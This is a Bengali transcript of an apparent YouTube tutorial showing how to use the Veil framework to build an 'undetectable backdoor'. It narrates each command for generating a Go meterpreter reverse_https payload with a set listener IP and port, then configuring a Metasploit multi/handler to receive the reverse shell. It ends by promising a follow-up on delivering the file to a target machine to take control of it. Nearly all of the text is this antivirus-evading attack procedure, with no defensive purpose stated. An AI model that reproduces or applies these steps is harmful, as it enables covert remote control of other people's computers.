সো হ্যালো বন্ধুরা, ওয়েলকাম টু মাই নিউ অ্যানাদার ভিডিও। আশা করি তোমরা সবাই ভালো আছো। যদি আমার চ্যানেলে কেউ প্রথম এসে থাকো তো চ্যানেলটা সাবস্ক্রাইব করতে ভুলো না, নোটিফিকেশন বেল আইকনটা প্রেস করতে ভুলো না, বিকজ যদি আমি কোনো নিউ ভিডিও আপলোড করি তোমরা পেয়ে যাবে। সো অ্যাট ফার্স্ট আমার স্ক্রিনে আমরা চলে এসেছি। সো দেখো ভিডিওটা কি করতে হয়। সো আমি আগে দেখেছিলাম ভেলটাকে ইনস্টল কি করে করতে হয়। সো আজকে আমি দেখাবো ভেলটাকে ইউজ কি করে করতে হয়। তার জন্য তোমরা জাস্ট এখানে সুডো পারমিশন দিয়ে VEIL এন্টার হিট করো, দেন সলভ। আর কিছু না। এবার তুমি যাও যে লিস্ট, LIST লিস্ট, এন্টার হিট করো। এখানে দেখো দুখানে টুলস আছে অ্যাভেলেবেল, ঠিক আছে। সো আমরা কি করব, আমরা এই প্রথম টুলটা ইউজ করব, ঠিক আছে। এই যে এই প্রথম টুলটা ইউয়েশন। সো আমরা এখানে জাস্ট লিখবো ইউজ 1 অ্যাজ এন্টার হিট। দেন দেখো আমার এখানে গিয়ে লিখেছে আমার কাছে আছে 41 পেলোডস অ্যান্ড এইগুলো আমার কিছু মানে কমান্ডস রয়েছে কী করে এটাকে ইউজ করতে হয়, কী করে অপারেট করতে হয়, দ্যাটস অল, আর কিচ্ছু না। সো দেখতে থাকো ভিডিওটা, আশা করি তোমাদের ভালো হবে। ভিডিওটা আমি চেষ্টা করবো যাতে বেশি লেন্থি না হয়। সো দেখো বেশি কথা না বাড়িয়ে চলো কাজ শুরু করা যায়। এখানে আমরা কি করব, এখানে আমরা লিখবো লিস্ট। লিস্টে এখানে দেখো লেখা রয়েছে লিস্টে, এখানে লিস্ট কমান্ড যদি আমি ইউজ করি তাহলে আমার এখানে অ্যাভেলেবেল যে পেলোডসগুলো রয়েছে সেগুলো আমার শো করবে। সো কী করে দেখতে হবে, লিস্ট LIST লিস্ট, দেন এন্টার হিট করো। এখানে দেখো এখানে আমাকে পেলোডসগুলো দিয়ে দিয়েছে। টোটাল 41 পেলোডস আছে। আমি এটাকে ইউজ করে তোমাদেরকে দেখাবো কী করে আনডিটেক্টেবল ব্যাকডোর ক্রিয়েট করতে হয়, সেটা আমি দেখাবো। তোমরা ওটা পিসিতে যে কোনো থ্রুতে তোমরা নিতে পারো, যেহেতু তোমরা ভার্চুয়াল মেশিন ইউজ করছো, ড্র্যাগ অ্যান্ড ড্রপ করে নিতে পারো, দিন ইউজ করতে পারো। ইউজ করার সাথে সাথে তোমাদের যে MSF কনসোলের ভেতর যে পেলোডটা ক্রিয়েট করার যে ইয়েটা ছিল সেটা চলবে। দেখতে পাবা যে তোমার এখানে কী করে ফেস করতে হবে ডেটা ফেটা, সেম প্রসেস। আগের যে ভিডিওগুলো তোমরা যদি না দেখে থাকো যে কী করে মানে মেটাসপ্লয়েড মেশিনটাকে অ্যাক্সেস করতে হয়, কীভাবে কী করতে হয়, ওই ভিডিওগুলো অবশ্যই একবার করে কিন্তু দেখে নাও, ঠিক আছে। না হলে তোমাদের প্রবলেম হবে। সো আমি লিঙ্ক অবশ্যই ডিসক্রিপশানে দিয়ে নেবো। তার আগে আমি বলে দিই। সো দেখো এখানে দেখা আছে এটা হচ্ছে ফার্স্ট পার্ট মানে হচ্ছে এই যে সি লেখা রয়েছে না। সো এটা অ্যাকচুয়ালি সিটা কারণ লেখা রয়েছে কারণ এটা সি ল্যাঙ্গুয়েজের ওপরে বেস করে বানানো রয়েছে, আর এটা মিটার ফ্রেমওয়ার্কের ওপর কাজ করছে। আর এটা মানে রিভার্স ইয়ের ওপর চলে। আমি একবার বলেছিলাম তোমাদের বাইন্ড আর একবার রিভার্সের ব্যাপারে যে আমি ডিফারেন্সিয়েশনটা দিয়েছিলাম, সেইটা একবার তুমি হয়তো তোমরা পুরোনো ভিডিওতে দেখেছো। সো এরকম একটা ব্যাপার। আর এটা .py বা .python ফাইল, ঠিক আছে, এটাই আর কি। এবার সো আমরা এখানে কি ইউজ করব, আমরা যে এই ফাইলটা ইউজ করব এইটাকে, এটাই তো, হ্যাঁ এটাই ইউজ করি চলো। সো আমরা এখানে এটা ইউজ করব, যেহেতু এখানে কি সিলেক্ট হয়ে গেছে, সরি। সো আমরা এখানে জাস্ট লিখব ইউজ 15 জাস্ট এন্টার হিট। দেখো আমার এখানে কিন্তু পেলোডটা সিলেক্ট হয়ে গেছে। দেখো আমি যে এখনই পেলোডটা সিলেক্ট করলাম এটা কিন্তু অটোমেটিকলি সিলেক্ট হয়ে গেছে। সো আমাদের এখানে কি করতে হবে, এখন আমাদের যেটা করতে হবে, আমাদের হোস্ট চেঞ্জ করতে হবে, পোর্ট চেঞ্জ করতে হবে, আর এই যে প্রসেসরস আছে প্রসেসর চেঞ্জ করতে হবে, আর স্লিপ টাইমটা দিয়ে দিতে হবে, ঠিক আছে। যাতে যেইটুকুনি সময় আমাদের ওখানে ধরো 6 সেকেন্ডস লাগছে বা 5 সেকেন্ডস লাগছে, মিনিমাম যে সময়টা আমাদের লাগবে ওইটা করতে, সেই সময়টা তো আমাদের কোডের মধ্যে আমাকে জানাতে হবে যে আমি এই টাইমটা আমার লাগছে এখন, ঠিক আছে। সো দেখতে দেখো, আশা করি তোমরা জানো যে কী করে পোর্ট হোস্ট এগুলো সেট করতে হয়। তাও যদি না জেনে থাকো আমি এখনই প্র্যাকটিক্যালি করে দেখাবো। সো দেখো অ্যাট ফার্স্ট লেখো সেট, তারপরে লেখো হোস্ট, দেখি তোমার IP অ্যাড্রেস। সো তোমার IP অ্যাড্রেস যেটা আসছে সেটা যদি তোমাদের দেখতে অসুবিধা হয় তাহলে জাস্ট যাও টার্মিনাল একটা খোলো, টার্মিনালে এন্টার হিট করো। টার্মিনাল এখানে অন হয়ে গেছে। ইফ কনফিগ এন্টার হিট করো। দেখো সো এইটা আমার IP অ্যাড্রেস, এইখানে যেটা আসবে সেটা তোমাদের IP অ্যাড্রেস হবে, ঠিক আছে। সো বি কেয়ারফুল। সবসময় মনে রাখবে যে তোমার লোকাল হোস্ট যেটা সেটা তোমার IP হবে, আর পোর্টটা তোমরা নিজেদের মতো অ্যাসাইন করতে পারো, সেটা তোমাদের ইচ্ছা মতো করতে পারো। সো আমি এখানে আমার IPটাকে অ্যাসাইন করে দিচ্ছি 192.168.85.132। দ্যাটস অল, আর কিচ্ছু না। এবার আমি কি করব, সেট LPORT LPORT
8080 নেক্সট হচ্ছে সেট প্রসেসর PROCESSORS প্রসেসর আমি দিতে চাই একটা, ঠিক আছে, প্রসেসর একটা, এন্টার। এবার আমি কি সেট করব, সেট স্লিপ SLEEP 6, এন্টার হিট করো, হয়ে গেছে। সো এবার যে আমাদের এগুলো আমি সেট করেছি এটাকে আমরা দেখবো কী করে, শো অপশানস বা অপশানস হিট করো, এক একটা ইয়েতে এক রকম নেই। সো তোমরা সেটাকে ট্রাই করে দেখতে পারো, কারণ বিকজ আমি সব রকমের লিনাক্স মেশিন আমি জানি না, সব রকম উবুন্টু আমি জানি না। সো তোমাদের হতে পারে যে শো অপশানসে নিয়ে নিতে পারে বা অপশানস লিখলেই নিতে পারে। সো আমি এখানে দেখাচ্ছি আমারটা, যেমন ধরো OPTIONS অপশানস, এন্টার হিট করলাম, এখানে কিন্তু আমার অপশানসেই নিয়ে নিয়েছে। এবার তুমি শো অপশানস তোমার MSF কনসোলেও নিতে পারে বা এখানেও নিতে পারে। সো এটা তোমাদের মেশিনটার উপর ডিপেন্ড করছে। এইবার দেখো আমাদের পেলোড কিন্তু রেডি হয়ে গেছে, এইটা আমাদের সিলেক্টেবল পেলোড, আর এইটুকুনি এটা হয়ে গেছে। এবার আমরা এটাকে কি করে চালাবো, আর কিছুই করতে হবে না। এবার চলো এবার আমরা কি করব, এখানে একটা MSF কনসোল করে নিই। সো এই টার্মিনালটা আমাদের লাগছে না, MSF কনসোল, এন্টার হিট করো। এটা স্টার্ট হতে একটু সময় নেই, দেখো এটা এখন স্টার্ট হচ্ছে, এই দেখো স্টার্ট হচ্ছে অলরেডি। সো একটুখানি ওয়েট করতে হবে, একটুখানি ওয়েট করে, বিকজ মেশিনের ওপর ডিপেন্ড করে। আর যদি তোমাদের ভিডিওটা ভালো লেগে থাকে আর এই রিলেটেড কন্টেন্টগুলো তোমাদের প্রয়োজন হয়ে থাকে, কমেন্ট করে জানাও। হ্যাঁ, কমেন্ট না করলে কিন্তু আমি জানতে পারবো না তোমাদের এই ভিডিওগুলো কেমন কি লাগছে বা কতটা দরকার হচ্ছে, ঠিক আছে। সো কমেন্ট করো আর ভিডিওগুলোকে শেয়ার করো। সো আমরা এখানে আমাদের কিন্তু MSF কনসোল মানে মেটাসপ্লয়েডটাকে অন করে নিয়েছি। আর মেটাসপ্লয়েড একটা বহুত বড় ফ্রেমওয়ার্ক, মানে একটা হিউজ ফ্রেমওয়ার্ক, মানে যেটার কোনো শেষ নেই, মানে সাগর আর যদি নদীর সাথে তুলনা করো মেটাসপ্লয়েড হচ্ছে সেরকম একটা ব্যাপার, ঠিক আছে। ও একটা সাগর, ওকে মানে অনেকটা বড় ধরতে গেলে, ঠিক আছে। সো এখানে আমাদের পুরো কাজটা কমপ্লিট হয়ে গেছে। সো আমরা এখানে কি লিখবো, জেনারেট, GENERAT, জেনারেট, এন্টার হিট। এবার তোমাকে এই যে পেলোডটা তুমি যেটা ক্রিয়েট করলে না, এই পেলোডটার নাম জিজ্ঞেস করবে, মানে তুমি কি নাম রাখতে চাও এই পেলোডটার। সো আমি ধরো রাখতে চাইছি rivers.http এরকম কিছু একটা, REV মাইনাস মানে REV মাইনাস HTTP, দ্যাটস অল, আর কিছু না। দিয়ে এন্টার হিট করো। এটা কিছুক্ষণ একটু সময় নেবে, সময় নেওয়ার পরে এটা তোমার রিগার্ডিং মানে কাজগুলো যেগুলো দরকার সেগুলো কমপ্লিট করছে, মানে যেরকম কী কী দরকার সেগুলো ও পেলোডটার মধ্যে ইনস্টল করবে, যা যা দরকার সেগুলো ও ইনস্টল করছে। ও দেখো ইনস্টল হচ্ছে, ইনস্টলিং প্রসেস চলছে। সো ততক্ষণ আগে তুমি এটা মনে রাখবে, পার ডে কিন্তু APT আপডেট আর APT আপগ্রেড তোমরা দুটোই জানো লিনাক্স মেশিনে ইউজ করো, কারণ বিকজ যে পুরোনো সফটওয়্যারগুলো আছে সেগুলো অনেক সময় ওল্ড হয়ে যায়, ব্যাকডেটেড হয়ে যায়। সো সেইগুলোকে আপডেট করা খুবই দরকার, ঠিক আছে, যদি তুমি অ্যাকচুয়ালি করতে চাও আপডেট। সো দেখো আমাদের এখানে কিন্তু গো ল্যাঙ্গুয়েজের থ্রুতে আমাদের এই পেলোড মডিউলটা রেডি হয়ে গেছে। সো এই যে এক্সিকিউটেবল রিটেন টু, এইটা কিন্তু আমাদেরকে কপি করে নিতে হবে, ঠিক আছে। এটা কপি করে নাও, কপি করে লাগতেও পারে। একটা কাজ করো, তোমরা নোটপ্যাড এটাকে পেস্ট করে রাখো। এই নোট বন্ধুরা ওটা পেস্ট করে রাখো, তোমরা যেখানে খুশি পেস্ট করে রাখতে পারো। দেন এখানে দেখো, এখানে আমাদের লিখতে হবে যেটা। সো আমাদের যেহেতু এখানে আমাদের যে ফাইলটা রেডি হয়ে গেছে, সো এটাকে এবার আমাদের এক্সিকিউট করতে হবে। সো এখানে আমি কি লিখবো, ইউজ এক্সপ্লয়েট মাল্টি হ্যান্ডলার। দেখো এবার দেখো তোমাদের হয়তো মনে আছে যে আমাদের এই দেখো এই যে এই পেলোডটা যেটা, সেটা কিন্তু আমাদের অ্যাকচুয়াল পেলোড নয় যেটা আমরা সিলেক্ট করেছিলাম। সো আমরা যে পেলোডটা সিলেক্ট করেছিলাম এ দেখো এখানে কি লেখা আছে, গো meterpreter/rivers https। তো আমাদের যে এই পেলোডটা রয়েছে এটা কিন্তু অন্য পেলোড,
এই যে সেল রিভার্স পেলোড, ঠিক আছে। সো আমাদের এখানে কি করতে হবে, এবার দেখো আমরা এখানে কি করবো, পেলোডটাকে চেঞ্জ করবো। সো এদের জন্য যে কমান্ডটা হচ্ছে, সো লেখো সেট পেলোড, পেলোড দিয়ে কি করতে হবে, পেলোড PAYLOAD পেলোড স্ল্যাশ উইন্ডোজ WINDOWS উইন্ডোজ দিয়ে ট্যাব এন্টার করো। যদি না নেই তারপরে আবার লেখো স্ল্যাশ পেলোড উইন্ডোজ মিটার বেটার রিভার্স ডট HTTPS। সো এখানে আমি এন্টার হিট করবো, আমার এটা সেট হয়ে গেছে। এটা অনেকটা বড়, তো যদি তোমাদের এই যে এখানে যে পেলোডটা আমরা সেট করলাম এটা যদি বুঝতে প্রবলেম হয় তাহলে তুমি এখানে কি লিখবে, শো SHOW শো পেলোডস PAYLOADS পেলোডস, এন্টার হিট করো। এখানে দেখো তোমাকে পেলোডসগুলো শো করবে। সো এখান থেকে একটু শো করতে টাইম নেবে, যেহেতু অনেকগুলো পেলোডস আছে এখানে, কী কী পেলোডস আছে এ দেখো। সো আমরা এখানে মনে হয় 117 মনে হয় আই থিঙ্ক ওই পেলোডটা ইউজ করছি। দাঁড়াও আমি আমাদের যে পেলোডটা লাগবে এই পেলোডটা। সো এটাকে তোমরা কপি করে নিতে পারো, কপি করে তোমরা পেস্ট করতে পারো, নো প্রবলেম, অ্যাজ ইউর উইশ, অ্যাজ ইউর চয়েস, তোমাদের যা ইচ্ছা। এবার সো আমাদের এখানে কী করতে হবে, শো অপশানস, শো OPTIONS শো অপশানস দিয়ে এন্টার হিট করো। সরি আমার ওখানে একটা ডট পড়ে গেছিলাম। সো শো অপশানস দিয়ে এন্টার হিট করো। সো দেখো আমাদের এখানে কী কী সেট করতে হবে, এখন আমাদের এলপোর্ট এলহোস্ট সেট করতে হবে। আর এ দেখো আমাদের যে পেলোডটা ওটা আমরা আবার রিসেট করেছিলাম। সো এ দেখো এটা সেট হয়ে গেছে। সো এখানে তোমরা জানো যে এলহোস্ট আর এলপোর্ট কী করে চেঞ্জ করতে হয়, তো আমার বলা লাগে তোমরা করে নাও, আমি জানি তোমরা অনেক ব্রিলিয়ান্ট। সো এখানে লিখো সেট এলহোস্ট দেন তোমার IP 192.168.85.132 দিয়ে এন্টার হিট করো। এন্টার হিট সেট হয়ে গেছে এলহোস্ট। সো এবার আমরা কী করবো, সেট করবো এলপোর্ট, LPORT এলপোর্ট কি 8080 অ্যাজ ইউর চয়েস, তুমি 440 দিতে পারো, 432 দিতে পারো, অ্যাজ ইউর চয়েস, 80 দিতে পারো। সো দেখো হয়ে গেছে। সো এবার আমাদের কী করতে হবে, এবার আমাদের জাস্ট লিখতে হবে এক্সপ্লয়েট। সো তার আগে আমরা দেখে নিই আমাদের পুরোপুরি জিনিসপত্রগুলো এখানে সেট হয়েছে নাকি, যেগুলো আমরা এখনই কমান্ড দিলাম সেটা দেখার জন্য এখানে কী করতে হবে, শো অপশানস, কি SHOW OPTIONS শো অপশানস। সো এ দেখো আমাদের এলপোস্ট সেট হয়ে গেছে, এলহোস্ট সেট হয়ে গেছে। সো এবার দেন আমরা কী করবো, এক্সপ্লয়েট EXPLOIT এক্সপ্লয়েট। সো এখানে একটু সময় নেবে, যদি এটা এরর দেয় আবার তুমি এক্সপ্লয়েট কমেন্টটা এন্টার করে হিট করো, দ্যাটস অল, আর কিচ্ছু না, তোমার ব্যাকডোর ইজ রেডি, ঠিক আছে। এইবার তোমার আজকের জন্য এইটুকুনি ভিডিওটা। সো আমি তোমাদের নেক্সট দিনকে দেখাবো কী করে এটাকে তোমাদের পোস্টিং করতে হয়, অ্যান্ড দেন কী করে তোমার টার্গেট মেশিনকে এইটা পাঠাতে হয়, কী করে ডেলিভার করতে হয় টার্গেট মেশিনে কন্ট্রোল করার জন্য। যদি ভিডিওটা তোমাদের ভালো লেগে থাকে তাহলে লাইক কমেন্ট শেয়ার করতে ভুলো না। আর যদি কোনো রকম তোমাদের কোনো কিছু ইস্যু হয় তাহলে আমাকে কমেন্টে জানাও। আর থ্যাংকস।